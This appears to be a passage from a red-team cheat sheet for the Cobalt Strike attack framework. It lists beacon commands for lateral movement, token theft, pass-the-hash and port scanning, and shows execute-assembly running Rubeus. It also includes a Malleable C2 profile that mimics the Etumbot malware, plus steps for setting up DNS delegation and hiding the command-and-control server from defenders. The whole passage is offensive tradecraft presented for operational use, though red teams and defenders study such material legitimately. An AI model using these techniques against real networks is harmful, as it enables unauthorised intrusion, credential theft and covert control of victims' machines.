- jump: Provides an easy and quick way to move laterally using winrm or psexec to spawn a new beacon session on a target.
- make_token: By providing credentials you can create an impersonation token in the current process and execute commands from the context of the impersonated user.
- steal_token: Steal a token from a specified process.

:exclamation: This module needs Administrator privileges.

- pth: By providing a username and an NTLM hash you can perform a Pass The Hash attack and inject a TGT on the current process.
- runas: A wrapper of runas.exe; using credentials you can run a command as another user.
- portscan: Performs a portscan on a specific target.

:warning: OPSEC Advice: Use the spawnto command to change the process Beacon will launch for its post-exploitation jobs.

```
beacon > execute-assembly
beacon > execute-assembly /home/audit/Rubeus.exe
```

```
# Etumbot Profile
# Author:
#
set sample_name "Etumbot";
set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
header "Content-Type" "application/octet-stream";
```

Use DNS NS records to delegate several domains or sub-domains to your Cobalt Strike team server's A record. Create a DNS A record and point it to your Cobalt Strike team server. Your Cobalt Strike team server system must be authoritative for the domains you specify.

- Create an NS record that points to the FQDN of your Cobalt Strike system.
- Create an A record for the Cobalt Strike system.

- No staging: set `hosts_stage` to `false` in Malleable C2.
- Edit the default HTTP 404 page and Content type: text/plain.
- Firewall 50050 and access via SSH tunnel.
- Firewall to only accept HTTP/S from the redirectors.
- Metasploit compatibility, ask for a payload: wget -U "Internet Explorer".
- Change the default self-signed HTTPS certificate.